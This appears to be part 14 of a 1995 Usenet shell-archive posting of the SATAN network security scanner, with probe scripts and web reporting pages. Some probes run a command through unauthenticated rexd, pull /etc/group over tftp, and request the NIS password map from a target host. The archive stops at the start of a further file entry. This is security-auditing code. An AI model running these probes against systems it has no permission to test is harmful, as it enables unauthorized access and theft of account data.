Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 138
Archive-name: satan/part14

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/bin/boot.satan satan-1.1.1/bin/rex.satan
# satan-1.1.1/bin/tcpscan.satan satan-1.1.1/bin/tftp.satan
# satan-1.1.1/bin/udpscan.satan satan-1.1.1/bin/xhost.satan
# satan-1.1.1/bin/yp-chk.satan
# satan-1.1.1/html/admin/satan_cf_action.pl
# satan-1.1.1/html/docs/quotes.html
# satan-1.1.1/html/reporting/analysis.pl
# satan-1.1.1/html/reporting/satan_info_OSclass.pl
# satan-1.1.1/html/reporting/satan_info_OStype.pl
# satan-1.1.1/html/reporting/satan_info_domain.pl
# satan-1.1.1/html/reporting/satan_info_host_action.pl
# satan-1.1.1/html/reporting/satan_info_trusted.pl
# satan-1.1.1/html/reporting/satan_results_domain.pl
# satan-1.1.1/html/reporting/satan_results_subnet.pl
# satan-1.1.1/html/reporting/satan_severity_types.pl
# satan-1.1.1/html/satan_documentation.pl
# satan-1.1.1/html/tutorials/first_time/learning_to_use.html
# satan-1.1.1/html/tutorials/first_time/make.html
# satan-1.1.1/html/tutorials/vulnerability_tutorials.pl
# satan-1.1.1/perl/getfqdn.pl satan-1.1.1/perllib/getopts.pl
# satan-1.1.1/repent satan-1.1.1/rules/trust
# satan-1.1.1/src/fping/Makefile satan-1.1.1/src/misc/global.h
# satan-1.1.1/src/misc/md5.c satan-1.1.1/src/misc/md5.h
# satan-1.1.1/src/port_scan/Makefile
# satan-1.1.1/src/port_scan/README
# satan-1.1.1/src/port_scan/find_addr.c
# satan-1.1.1/src/port_scan/lib.h satan-1.1.1/src/port_scan/ring.c
# satan-1.1.1/src/rpcgen/Makefile
# Wrapped by kent@ftp on Wed Apr 12 20:30:11 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 14 (of 15)."'
if test -f 'satan-1.1.1/bin/boot.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/boot.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/boot.satan'\" $1124 characters$
sed "s/^X//" >'satan-1.1.1/bin/boot.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# Execute a bootparam WHOAMI request and report the results.
X#
X$running_under_satan = 1;
Xrequire 'config/paths.pl';
Xrequire 'perl/misc.pl';
Xrequire 'perl/fix_hostname.pl';
X
Xdie "usage: $0 client server" unless ($#ARGV == 1);
X
X$target = $client = $ARGV[0];
X$server = $ARGV[1];

X
X# fields for satan...
X$severity="x";
X$status="a";

X$service = "boot";
X
Xopen(BOOT, "$BOOT $client $server|");
X
Xwhile (<BOOT>) {
X chop;
X if (/domain_name:\s+(\S+)/) {
X $service_output = "domain $1";
X $target = $server; &satan_print;
X $target = $client; &satan_print;
X }
X if (/client_name:\s+(\S+)/) {
X $client = &fix_hostname($1, $server);
X $service_output = "client $client";
X $target = $client; &satan_print;
X }
X if (/router_addr:\s+(\S+)/) {
X $service_output = "router $1";
X $target = $client; &satan_print;
X }
X}
Xclose(BOOT);

X
X# print something out if nothing has happened so far...
X# if rpcinfo returns !0, then flag it; else, nothing interesting showed up.

Xif ($service_output eq "") {

X $severity="";
X if ($?) {

X $text="boot error #$?";
X } else {
X $text="No boot output of interest";
X }
X &satan_print();
X}
END_OF_FILE
if test 1124 -ne `wc -c <'satan-1.1.1/bin/boot.satan'`; then
echo shar: \"'satan-1.1.1/bin/boot.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/boot.satan'
# end of 'satan-1.1.1/bin/boot.satan'
fi
if test -f 'satan-1.1.1/bin/rex.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/rex.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/rex.satan'\" $891 characters$
sed "s/^X//" >'satan-1.1.1/bin/rex.satan' <<'END_OF_FILE'
X#!/bin/sh
X#
X# If the host permits on/rexd with default auth_unix authentication,
X# get the message of the day to prove we were in.
X
X. config/paths.sh

X
X# used in final output

Xtarget=$1

Xservice=`$BASENAME $0 | $SED 's/\..*$//'`
Xstatus="a"
X

Xtmp_file=/tmp/rex.$$
X
Xtrap "$RM -f $tmp_file; exit" 0 1 2 3 15
X
Xcase $# in
X 1) target=$1;;
X *) $ECHO Usage: $0 target 1>&2; exit 1;;
Xesac
X
X# need the C program/exe to do the real work:
Xif $TEST ! -f "$REX" ; then

X exit 1
X fi
X

X$REX -a 1,1,1 $target date >$tmp_file 2>/dev/null
X
Xif $TEST -s $tmp_file ; then
X severity="us"
X trustee="USER@$target"
X trusted="ANY@ANY"
X service_output="REXD access"
X text="rexd is vulnerable to the world"

Xelse
X severity=""
X trustee=""
X trusted=""
X service_output=""

X text="rexd isn't vulnerable"
X fi

X# that's it...
END_OF_FILE
if test 891 -ne `wc -c <'satan-1.1.1/bin/rex.satan'`; then
echo shar: \"'satan-1.1.1/bin/rex.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/rex.satan'
# end of 'satan-1.1.1/bin/rex.satan'
fi
if test -f 'satan-1.1.1/bin/tcpscan.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/tcpscan.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/tcpscan.satan'\" $1232 characters$
sed "s/^X//" >'satan-1.1.1/bin/tcpscan.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# version 1, Mon Mar 20 18:44:32 1995, last mod by wietse
X#
X
X#
X# Report TCP services (banners where possible).
X#
Xrequire 'config/paths.pl';
Xrequire 'perl/misc.pl';
Xrequire 'perllib/getopts.pl';
X
X$usage = "usage $0 [-v] ports target";
X

X&Getopts("v") || die $usage;

Xdie $usage unless ($#ARGV == 1);
X
X($services = $ARGV[0]) =~ tr /,/ /;
X$target = $ARGV[1];
X

X$severity = "x";
X$status = "a";

X
X$| = 1;
X

Xopen(SERVICES, $SERVICES) || die "$0: cannot open $SERVICES: $!\n";
Xwhile (<SERVICES>) {
X $service_name{$2} = $1 if /(\S+)\s+([0-9]+)\/tcp/;
X}
Xclose(SERVICES);
X
X$command = "$TCP_SCAN -bs 'QUIT\\r\\n' $target $services";
X
Xprint "$command\n" if $opt_v;
X
Xopen(TCP_SCAN, "$command|")
X || die "$0: cannot run $TCP_SCAN";
X
Xwhile(<TCP_SCAN>) {

X if (defined($opt_v)) {
X print;
X }

X chop;
X s/^600([0-9]):[^:]*/600$1:X-$1/;
X s/^60([1-9][0-9]):[^:]*/60$1:X-$1/;
X ($port, $service, $flag, $service_output) = split(/:/, $_, 4);
X $service = $service_name{$port} if $service_name{$port};
X if ($flag =~ /t/ && $port != 23 && $service_output) {
X $service = "telnet on port $port";
X } elsif ($service eq "UNKNOWN") {
X $service = "$port:TCP";
X }
X $service_output =~ y/|/?/;
X $text = "offers $service";
X &satan_print();
X}
END_OF_FILE
if test 1232 -ne `wc -c <'satan-1.1.1/bin/tcpscan.satan'`; then
echo shar: \"'satan-1.1.1/bin/tcpscan.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/tcpscan.satan'
# end of 'satan-1.1.1/bin/tcpscan.satan'
fi
if test -f 'satan-1.1.1/bin/tftp.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/tftp.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/tftp.satan'\" $1292 characters$
sed "s/^X//" >'satan-1.1.1/bin/tftp.satan' <<'END_OF_FILE'
X#!/bin/sh
X#
X# Usage: $0 target_host
X#
X# Quick (well, relative; quickly written code, not a quick test) tftp
X# checker.
X#
X# Connects to the host, tries to get the password file. Takes a long
X# time to timeout...
X#
X
X#
X# Location of stuff:
X
X. config/paths.sh
X
X# need a target, eh?
Xif $TEST $# -ne "1" ; then
X $ECHO Usage: $0 target_host

X exit 1
X fi
X
X# used in final output

Xtarget=$1

Xservice=`$BASENAME $0 | $SED 's/\..*$//'`
Xstatus="a"
X

X# tmp and target file
Xfile=/etc/group
XTMP=./tmp.$$
X
X#
X# Do the dirty work -- check tftp for the localhost, if it was found;
X# this might take a bit, since tftp might have to time out.
X{
X$TFTP << _XXX_
Xconnect $target
Xget $file $TMP
Xquit
X_XXX_
X} > /dev/null 2> /dev/null
X
Xif $TEST -s $TMP ; then
X trustee="nobody@$target"
X trusted="ANY@ANY"
X service_output="TFTP file access"
X text="tftp file read"
X severity="nr"
X $ECHO "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text"
X # little trick; output it once, then again below, for both
X # reading and writing.
X text="tftp file write"
X severity="nw"

Xelse
X severity=""
X trustee=""
X trusted=""
X service_output=""

X text="tftp isn't running or is restricted"

X$RM -f $TMP
X
Xexit 0
X
X# end of script
END_OF_FILE
if test 1292 -ne `wc -c <'satan-1.1.1/bin/tftp.satan'`; then
echo shar: \"'satan-1.1.1/bin/tftp.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/tftp.satan'
# end of 'satan-1.1.1/bin/tftp.satan'
fi
if test -f 'satan-1.1.1/bin/udpscan.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/udpscan.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/udpscan.satan'\" $968 characters$
sed "s/^X//" >'satan-1.1.1/bin/udpscan.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# version 1, Mon Mar 20 18:46:18 1995, last mod by wietse
X#
X
X#
X# Report UDP services.
X#
Xrequire 'config/paths.pl';
Xrequire 'perl/misc.pl';
Xrequire 'perllib/getopts.pl';
X
X$usage = "usage $0 [-v] ports target";
X

X&Getopts("v") || die $usage;

Xdie $usage unless ($#ARGV == 1);
X
X($services = $ARGV[0]) =~ tr /,/ /;
X$target = $ARGV[1];
X

X$severity = "x";
X$status = "a";

X
X$| = 1;
X

Xopen(SERVICES, $SERVICES) || die "$0: cannot open $SERVICES: $!\n";
Xwhile (<SERVICES>) {
X $service_name{$2} = $1 if /(\S+)\s+([0-9]+)\/udp/;
X}
X
X$command = "$UDP_SCAN $target $services";
X
Xprint "$command\n" if $opt_v;
X
Xopen(UDP_SCAN, "$command|")
X || die "$0: cannot run $UDP_SCAN";
X
Xwhile(<UDP_SCAN>) {

X if (defined($opt_v)) {
X print;
X }

X chop;
X ($port, $service) = split(/:/, $_);
X $service = $service_name{$port} if $service_name{$port};
X if ($service eq "UNKNOWN") { $service = "$port:UDP"; }
X $service_output = "";
X $text = "offers $service";
X &satan_print();
X}
END_OF_FILE
if test 968 -ne `wc -c <'satan-1.1.1/bin/udpscan.satan'`; then
echo shar: \"'satan-1.1.1/bin/udpscan.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/udpscan.satan'
# end of 'satan-1.1.1/bin/udpscan.satan'
fi
if test -f 'satan-1.1.1/bin/xhost.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/xhost.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/xhost.satan'\" $1012 characters$
sed "s/^X//" >'satan-1.1.1/bin/xhost.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# Query the target's X display and report whether or not it is vulnerable
X# to simple X attacks (keystroke grabbing, etc.)
X#
X#
Xrequire 'config/paths.pl';
Xrequire 'perl/misc.pl';
Xrequire 'perllib/getopts.pl';
X
X$usage = "Usage: $0 [-d display] [-v] target";
X&Getopts("d:v") || die $usage;

X($#ARGV == 0) || die $usage;
X

X# used in final output

X$target = $ARGV[0];
X$display = defined($opt_d) ? $opt_d : "$target:0";

X$service = &basename($0, ".satan");

X$status = "a";
X
X# the actual program that does the work
X
X$command = "DISPLAY=$display $XHOST 2>/dev/null";
Xprint "$command\n" if $opt_v;
Xopen (XHOST, "$command|") || die "cannot run $XHOST";
Xif (<XHOST> =~ /disabled/i) {
X $severity = "us";
X $trustee = "USER\@$target";

X $trusted = "ANY\@ANY";

X $service_output = "unrestricted X server access";
X $text = "no X server access control";
X} else {

X $severity = "";
X $trustee = "";
X $trusted = "";
X $service_output = "";

X $text = "X server isn't vulnerable";
X}
X
X&satan_print();
X
X# that's it...
END_OF_FILE
if test 1012 -ne `wc -c <'satan-1.1.1/bin/xhost.satan'`; then
echo shar: \"'satan-1.1.1/bin/xhost.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/xhost.satan'
# end of 'satan-1.1.1/bin/xhost.satan'
fi
if test -f 'satan-1.1.1/bin/yp-chk.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/yp-chk.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/yp-chk.satan'\" $1131 characters$
sed "s/^X//" >'satan-1.1.1/bin/yp-chk.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# Query the NIS server.

X#
X
X$running_under_satan = 1;
Xrequire 'config/satan.cf';
Xrequire 'config/paths.pl';
Xrequire 'perl/misc.pl';
Xrequire 'perl/hostname.pl';
Xrequire 'perl/getfqdn.pl';
Xrequire 'perllib/getopts.pl';
X

X$usage="Usage: $0 [-t timeout -u -v] domain target\n";

X$opt_u = $untrusted_host;
X&Getopts("t:uv") || die $usage;
X$timeout = $short_timeout;
X

X($#ARGV == 1) || die $usage;
X
X$domain = $ARGV[0];
X$target = $ARGV[1];

X$flags = "-v" if defined($opt_v);
X$timeout = $opt_t if defined($opt_t);
X$untrusted_host = $opt_u;
X

X$flags = "$flags -t $timeout";

X
X$service = &basename($0, ".satan");
X$severity = "x";
X$status = "a";
X$service_output = "";
X
X$| = 1;
X

X$command = "$YP_CHK $flags $domain passwd.byname $target";
X
Xprint "$command\n" if $opt_v;
X
Xopen(YP, "$command |") || die "$0: cannot run yp-chk";
Xwhile(<YP>) {

X if (defined($opt_v)) {
X print;
X }

X if ($untrusted_host && /:.*:.*:.*:.*:.*:/) {

X $trusted = "ANY\@ANY";

X $severity = "us";
X $trustee = "user\@$target";
X $service_output = "NIS password file access";
X $text = $service_output;
X &satan_print();
X }
X # Other NIS problems later.
X}
END_OF_FILE
if test 1131 -ne `wc -c <'satan-1.1.1/bin/yp-chk.satan'`; then
echo shar: \"'satan-1.1.1/bin/yp-chk.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/yp-chk.satan'
# end of 'satan-1.1.1/bin/yp-chk.satan'
fi
if test -f 'satan-1.1.1/html/admin/satan_cf_action.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/admin/satan_cf_action.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/admin/satan_cf_action.pl'\" $857 characters$
sed "s/^X//" >'satan-1.1.1/html/admin/satan_cf_action.pl' <<'END_OF_FILE'
X#
X# Collect data and keep the user informed.
X#
X
Xrequire "perl/config.pl";
X
X#
X# Make sure they specified a data file
Xif ($satan_data eq "") {
X print CLIENT <<EOF;
X<HTML>
X<HEAD>
X<TITLE>Error - Missing input (no SATAN data file found)</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Missing input </H1>
X<hr>

XNo data directory was specified.

X</BODY>
X</HTML>
XEOF
X die "\n";
X }
X
X#

X# Write the data...
X&write_config_file($html_post_attributes);
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>

X<TITLE>SATAN Configuration Management</TITLE>

X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN Configuration Management </H1>
X<hr>
X<B>Configuration file changed</B>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 857 -ne `wc -c <'satan-1.1.1/html/admin/satan_cf_action.pl'`; then
echo shar: \"'satan-1.1.1/html/admin/satan_cf_action.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/admin/satan_cf_action.pl'
fi
if test -f 'satan-1.1.1/html/docs/quotes.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/quotes.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/quotes.html'\" $1019 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/quotes.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Quotes about SATAN</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H2><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Quotes about SATAN</H2>
X<HR>
X<H3>Pre-release:</H3>
X<p>
X"It's like randomly mailing automatic rifles to 5,000 addresses. I
Xhope some crazy teen doesn't get a hold of one." (Oakland tribune.)
X<p>
X"SATAN is like a gun, and this is like handing a gun to a 12-year-old."
X(LA times.)
X<p>
X"It's like distributing high-powered rocket launchers throughout the world,
Xfree of charge, available at your local library or school, and inviting people
Xto try them out by shooting at somebody." (San jose mercury.)
X<p>
X"It discovers vulnerabilities for which we have no solutions." (The New York Times.)
X<p>
X"...people could die." (vi...@aol.com (VikR))
X<p>
X<H3>Post-release:</H3>
X<p>
X"...there is no obscuring its
Xpresence. It announces itself like a rock concert to the scanned
Xmachine's log file." (Nick Christenson, n...@minotaur.jpl.nasa.gov)

X</BODY>
X</HTML>
END_OF_FILE

if test 1019 -ne `wc -c <'satan-1.1.1/html/docs/quotes.html'`; then
echo shar: \"'satan-1.1.1/html/docs/quotes.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/quotes.html'
fi
if test -f 'satan-1.1.1/html/reporting/analysis.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/analysis.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/analysis.pl'\" $1176 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/analysis.pl' <<'END_OF_FILE'
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title>SATAN Reporting and Analysis</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">

X</HEAD>
X<BODY>
X

X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN Reporting and Analysis</H1>
X<HR>
X<h2> Table of contents</h2>
X<HL>
X<p>
X<strong> Vulnerabilities </strong>
X <ul>
X <li> <a href=satan_results_danger.pl> By Approximate Danger Level </a>
X <li> <a href=satan_severity_types.pl> By Type of Vulnerability </a>
X <li> <a href=satan_severity_counts.pl> By Vulnerability Count </a>
X </ul>
X
X<strong> Host Information </strong>
X <ul>
X <li> <a href=satan_info_class.pl> By Class of Service</a>
X <li> <a href=satan_info_OS.pl> By System Type</a>
X <li> <a href=satan_info_domain.pl> By Internet Domain</a>
X <li> <a href=satan_info_subnet.pl> By Subnet</a>
X <li> <a href=satan_info_name.pl> By Host Name</a>
X </ul>
X<p>
X
X<strong> Trust</strong>
X <ul>
X <li> <a href=satan_info_trusted.pl> Trusted Hosts</a>
X <li> <a href=satan_info_trusting.pl> Trusting Hosts</a>
X </ul>
X<p>
X
X<HL>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1176 -ne `wc -c <'satan-1.1.1/html/reporting/analysis.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/analysis.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/analysis.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_OSclass.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_OSclass.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_OSclass.pl'\" $1054 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_OSclass.pl' <<'END_OF_FILE'
X#
X# Report all versions of the specified operating system class.
X#
X&make_hosttype_info();
X
X($_class) = split(/,/, $html_script_args);
X$_class =~ tr /?!/ \//;
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> System type - $_class </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> System type - $_class </H1>
X<hr>
X<h3>Number of hosts per operating system version (vulnerable/total).</h3>
X<ul>
XEOF
X
Xfor (sort split(/\n/, $systypes_by_class{$_class})) {
X # Mask possible blanks and slashes in the system type names.
X ($_type = $_) =~ tr / \//?!/;
X $_dot = $systype_severities{$_} ? "reddot" : "blackdot";
X $_alt = $systype_severities{$_} ? "*" : "-";
X print CLIENT <<EOF;

X <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt">

X <a href="satan_info_OStype.pl,$_type,"> $_</a>
X ($systype_severities{$_}/$systype_counts{$_})
XEOF

X}
Xprint CLIENT <<EOF
X</ul>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1054 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_OSclass.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_OSclass.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_OSclass.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_OStype.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_OStype.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_OStype.pl'\" $1161 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_OStype.pl' <<'END_OF_FILE'
X#
X# List all hosts that run a specific operating system version.
X#
X
X&make_hosttype_info();
X
X($_TYPE, $_sort_order) = split(/,/, $html_script_args);
X($_type = $_TYPE) =~ tr/?!/ \//;
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Host Table - $_type Systems </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - $_type Systems </H1>

X<hr>
X
X<h3>

X$systype_severities{$_type} Vulnerable/$systype_counts{$_type} total.

XVulnerability counts in parentheses.
X</h3>
X
X<H4> Sort hosts by:

X<a href="satan_info_OStype.pl,$_TYPE,name,">name</a> |
X<a href="satan_info_OStype.pl,$_TYPE,domain,">domain</a> |
X<a href="satan_info_OStype.pl,$_TYPE,subnet,">subnet</a> |
X<a href="satan_info_OStype.pl,$_TYPE,severity,">problem count</a> |
X<a href="satan_info_OStype.pl,$_TYPE,severity_type,">problem type</a>

X</H4>
X
X</FORM>
XEOF
X

X@_hosts = split(/\n/, $hosts_by_systype{$_type});

Xdo "$html_root/reporting/sort_hosts.pl";
Xprint CLIENT $@ if $@;
X
Xprint CLIENT <<EOF;

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1161 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_OStype.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_OStype.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_OStype.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_domain.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_domain.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_domain.pl'\" $1083 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_domain.pl' <<'END_OF_FILE'
X#
X# Report all internet domains.
X#
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Host Tables - by Internet Domain </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Tables - by Internet Domain </H1>
X<hr>
X<h3>Number of hosts per internet domain (vulnerable/total).</h3>
X<strong>Domains with a red dot next to them have a vulnerable host contained within.</strong>
X<ul>
XEOF
X
X&make_domain_info() ;
X
Xfor (sort keys %all_domains) {
X next if (!$_);
X $_dot = $domain_severities{$_} ? "reddot" : "blackdot";
X $_alt = $domain_severities{$_} ? "*" : "-";
X print CLIENT <<EOF;

X <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt">

X <a href="satan_results_domain.pl,$_,"> $_</a>
X ($domain_severities{$_}/$domain_count{$_})

XEOF
X}
X
Xprint CLIENT <<EOF;
X</ul>

XEOF
X
Xif (sizeof(*all_domains) == 0) {
X print CLIENT <<EOF;
X No domain information available.

XEOF
X}
X
Xprint CLIENT <<EOF;
X</ul>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1083 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_domain.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_domain.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_domain.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_host_action.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_host_action.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_host_action.pl'\" $927 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_host_action.pl' <<'END_OF_FILE'
X#
X# Translate HMTL arg list form.
X#
Xif ($_query_host eq "") {
X print CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title>Error - No Host </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - No Host </H1>
X<hr>
X<h2>Error: no host name specified. Try again.</h2>
XEOF
X} else {
X $_query_host =~ tr /A-Z/a-z/;
X $_query_host = &getfqdn($_query_host) if (&getfqdn($_query_host));
X if (defined($all_hosts{$_query_host})) {
X $html_script_args = $_query_host;
X do "$html_root/reporting/satan_info_host.pl";
X print CLIENT $@ if $@;
X } else {
X print CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title>Error - Unknown Host </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Unknown Host </H1>
X<hr>
X<h2>Error: unknown host name specified: $_query_host. Try again.</h2>

XEOF
X }
X}
Xprint CLIENT <<EOF

X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 927 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_host_action.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_host_action.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_host_action.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_trusted.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_trusted.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_trusted.pl'\" $1009 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_trusted.pl' <<'END_OF_FILE'
X#
X# Report which hosts are trusted how many times
X#
Xsub sort_numerically {
X $total_trustee_count{$b} <=> $total_trustee_count{$a};

X}
X
Xprint CLIENT <<EOF;

X<HTML>
X<HEAD>
X<title> Trust - Trusted Hosts</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Trust - Trusted Hosts</H1>
X<hr>
X<h3>Trusted hosts (by number of trusting hosts).</h3>

X<ul>
XEOF
X
X&make_severity_info();
X

Xfor (sort sort_numerically keys %total_trustee_count) {

X $_dot = exists($severity_host_type_info{$_}) ? "reddot" : "blackdot";
X $_alt = exists($severity_host_type_info{$_}) ? "*" : "-";

X print CLIENT <<EOF;

X <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt">
X <A HREF="satan_info_host.pl,$_,">$_</A> -

X <A HREF="satan_results_trusting.pl,$_,trustee_type,"> $total_trustee_count{$_} host(s)</A>

XEOF
X}
X
Xprint CLIENT <<EOF;
X</ul>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1009 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_trusted.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_trusted.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_trusted.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_results_domain.pl' -a "${1}" != "-c" ; then
